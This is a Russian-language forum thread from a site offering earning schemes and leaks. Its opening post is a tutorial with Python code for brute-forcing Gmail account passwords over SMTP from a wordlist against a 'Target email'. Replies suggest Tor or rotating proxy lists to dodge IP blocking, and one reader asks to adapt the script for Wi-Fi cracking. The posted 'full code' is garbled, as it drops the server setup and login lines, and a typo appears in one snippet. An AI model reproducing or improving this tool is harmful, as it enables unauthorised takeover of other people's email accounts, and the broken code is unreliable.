• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Пишем свой брутфорс на Python

Miron_T31

Местный
Реакции
160
0 руб.
Python.jpg
Привет всем.Сегодня я вам расскажу как написать свою брутфорс на Python и с каким проблемами столкнулся я как новичок. Начнем!
Предыстория:
Как-то раз я чекал ютуб и мне на глаза попался канал программиста который писал на Python всякие плюшки по типу стиллеров, брутфорсов архивов,локеров и т.д. И я подумал:"А почему я не могу написать что-то похожее?".И мой выбор остановился на брутфорсе почт gmail.Как и все новички или опытные программисты я должен был реализовать идею в голове то есть ,что должен делать скрипт и как он должен это делать.Не много подумав и изучим материала в интернете я приступил к практике!
Практика:
Почта работает через порт 25 и протокол SMTP,значит для того чтоб написать брут нам понадобиться импортировать SMTP библиотеку и импортировать параметр system из os позже скажу зачем.
Код:
import smtplib
from os import system
import colorama
Для установки corama надо прописать в cmd
pip install colorama
Я решил,что брать пароли лучше из словаря для этого мы и импортировали модуль system. Теперь надо предоставить пользователю выбор:
Код:
print ('1. Start')
print ('2. Exit')
option = input('==> ')
Так пока неплохо,двигаемся дальше.Теперь когда мы предоставили пользователю выбор между пунктом "Start" и "Exit" надо назначить условие:
Код:
if option == '1':
   passlist = input('Enter password_list: ')
pass_found = open(passlist, 'r')
В этом коде мы назначаем пункту "Start" условие,что если пользователь выберет 1 пункт,а это "Start", то мы даем пользователю возможность ввести путь к файлу и сохраняем этот путь в переменной . А после мы открываем файл и читаем его.Так ,что же делать дальше?А дальше нам надо будет дать возможность пользователю ввести почту и скажем так приконектиться к сервису gmail с этой почтой(больше ни как не могу объяснить уж извиняйте).Вот так все это будет выглядеть:
Код:
user_name = input('Target email: ')
server = smtplib.SMTP('smtp.googlemail.com',587)
server.ehlo()
server.starttls()
Обратите внимание на строку:
В интернете я прочитал,что правильным нужно сделать так:
server = smtplib.SMTP_SSL('smtp.googlemail.com',587)
Но при запуске скрипта мне вылетала ошибка :
ssl.SSLError: [SSL: UNKNOWN_PROTOCOL] unknown protocol (_ssl.c:833)
Но когда я запускал с таким параметром на Linux Mint с Python 3.6 ,то все было хорошо.Наверно это опять еба*ый windows и для того что исправить эту проблему я как бы "Вшил" не защищенное соединение в TLS командой:
Код:
server.startrls()
И завершающий блок кода:
Код:
for password in pass_found:
    try:
        server.login(user_name, password)
        print(Fore.GREEN + '[+] Password Found: ' + password)
        break;
    except smtplib.SMTPAuthenticationError:
       print(Fore.RED + '[-] Password not founded')
input()
В этом блоке все предельно просто.Мы в создаем цикл в котором перебираются пароли.В функцию try мы записывает условие ,что если пароль верный ,то мы логинемся.Также правильные пароли подсвечиваются зеленым,а неправильные красным. Вот полный код:
Код:
import smtplib
import colorama
from colorama import init, Fore, Back
from os import system
print('   ======================  ')
print('        Для vlmi.top!                       ')
print('   ======================  ')
init()
print ('1. Start')
print ('2. Exit')
option = input('> ')
if option == '1':
   passlist = input('Enter password_list: ')
if option == '2':
   exit()
pass_found = open(passlist, 'r')
user_name = input('Target email: ')
server.ehlo()
server.starttls()
for password in pass_found:
    try:
        print(Fore.GREEN + '[+] Password Found: ' + password)
        break;
    except smtplib.SMTPAuthenticationError:
       print(Fore.RED + '[-] Password not founded')
input()
Спасибо за внимание и удачи!

BotHub

Разработчик ботов

BotHub

Разработчик ботов
Резидент
Реакции
420
0 руб.
Telegram
как обстоят дела со сменой IP? Просто если подбирать так, быстро уйдёт в бан IP.

Miron_T31

Местный
Реакции
160
0 руб.
как обстоят дела со сменой IP? Просто если подбирать так, быстро уйдёт в бан IP.
Я пока тестировал это 'чудо' раз 15 брутфорс'ил свои 2 аккаунта и все ок. И брутфорс' ещё друга
[automerge]1539800919[/automerge]
Tor вруби и херач

BotHub

Разработчик ботов

BotHub

Разработчик ботов
Резидент
Реакции
420
0 руб.
Telegram
Я пока тестировал это 'чудо' раз 15 брутфорс'ил свои 2 аккаунта и все ок. И брутфорс' ещё друга
[automerge]1539800919[/automerge]

Tor вруби и херач
я в том смысле, что в момент подбора пароля, через какое то количество попыток, блокируется возможность зайти, и в основном они по IP смотрят, возможно имено Gmail, так не делают, я подобным не занимался, но в большинстве своём для брута, нужен ещё и лист с прокси, которые будут время от времени меняться.
[automerge]1539802918[/automerge]
но в принципе и эту возможность не долго добавить. Если есть ещё идеи и какие то наработки, можешь размещать их в теме, которую я создал, по полезным кодам на Python. Будет время, закину пару наработок по работе с Telegram.

Последнее редактирование:

Miron_T31

Местный
Реакции
160
0 руб.
я в том смысле, что в момент подбора пароля, через какое то количество попыток, блокируется возможность зайти, и в основном они по IP смотрят, возможно имено Gmail, так не делают, я подобным не занимался, но в большинстве своём для брута, нужен ещё и лист с прокси, которые будут время от времени меняться.
[automerge]1539802918[/automerge]
но в принципе и эту возможность не долго добавить. Если есть ещё идеи и какие то наработки, можешь размещать их в теме, которую я создал, по полезным кодам на Python. Будет время, закину пару наработок по работе с Telegram.
Хорошо

Rip Hunter

Новичок
Реакции
0
0 руб.
Доброго времени суток! У меня Вопрос, а можно переделать этот код под подбор паролей к WiFi??? Если да то можете помочь? Буду очень благодарен!

Kirill_Monster

Новичок
Реакции
0
0 руб.
Запускаю скрипт в файле верный пароль пишет что не подходит меняю на mail.ru проверяет только два пароля потом выдает ошибку
Traceback (most recent call last):
File "C:\Users\Lenovo\Desktop\bot\hack mail\hack.py", line 23, in <module>
File "C:\Users\Lenovo\AppData\Local\Programs\Python\Python39\lib\smtplib.py", line 734, in login
(code, resp) = self.auth(
File "C:\Users\Lenovo\AppData\Local\Programs\Python\Python39\lib\smtplib.py", line 637, in auth
(code, resp) = self.docmd("AUTH", mechanism + " " + response)
File "C:\Users\Lenovo\AppData\Local\Programs\Python\Python39\lib\smtplib.py", line 427, in docmd
return self.getreply()
File "C:\Users\Lenovo\AppData\Local\Programs\Python\Python39\lib\smtplib.py", line 400, in getreply
raise SMTPServerDisconnected("Connection unexpectedly closed")
smtplib.SMTPServerDisconnected: Connection unexpectedly closed

Kirill_Monster

Новичок
Реакции
0
0 руб.
Запускаю скрипт в файле верный пароль пишет что не подходит меняю на mail.ru проверяет только два пароля потом выдает ошибку
Traceback (most recent call last):
File "C:\Users\Lenovo\Desktop\bot\hack mail\hack.py", line 23, in <module>
File "C:\Users\Lenovo\AppData\Local\Programs\Python\Python39\lib\smtplib.py", line 734, in login
(code, resp) = self.auth(
File "C:\Users\Lenovo\AppData\Local\Programs\Python\Python39\lib\smtplib.py", line 637, in auth
(code, resp) = self.docmd("AUTH", mechanism + " " + response)
File "C:\Users\Lenovo\AppData\Local\Programs\Python\Python39\lib\smtplib.py", line 427, in docmd
return self.getreply()
File "C:\Users\Lenovo\AppData\Local\Programs\Python\Python39\lib\smtplib.py", line 400, in getreply
raise SMTPServerDisconnected("Connection unexpectedly closed")
smtplib.SMTPServerDisconnected: Connection unexpectedly closed
и тоже пароль верный не видит хотя он второй по счету и он его проверяет. Сегодня и вчера всё было норм

kkkqwerasdtyr

Новичок
Реакции
0
0 руб.
Если в настройках нужной почты запрещены небезопасные приложения, то забрутить не получится. Наверно 3 года назад такого еще не было и всё работало

Сверху Снизу